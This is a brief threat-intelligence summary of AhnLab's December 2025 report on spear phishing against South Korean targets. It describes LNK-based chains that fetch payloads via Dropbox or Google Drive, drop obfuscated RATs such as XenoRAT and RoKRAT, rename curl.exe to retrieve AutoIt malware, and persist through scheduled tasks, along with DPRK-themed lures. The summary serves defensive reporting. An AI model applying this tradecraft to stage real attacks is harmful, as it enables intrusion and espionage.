AhnLab's December 2025 domestic APT trend report says spear phishing dominated observed attacks against South Korean targets, with LNK files accounting for the largest share that month. One LNK-based pattern executed malicious PowerShell from compressed attachments, used Dropbox API or Google Drive to fetch payloads, wrote scripts and obfuscated RAT malware under locations such as %PUBLIC%, and launched RATs including XenoRAT and RoKRAT for keylogging, screenshots, and operator-controlled actions. Another LNK pattern downloaded AutoIt malware by copying curl.exe under another filename, retrieving a normal AutoIt binary and malicious script, and registering scheduled tasks for persistence. DPRK-relevant lures in the excerpt include North Korean defector support paperwork and a 2025 North Korean human-rights youth academy lecture topic, showing continued use of Korean policy and social-issue themes in domestic spear-phishing tradecraft.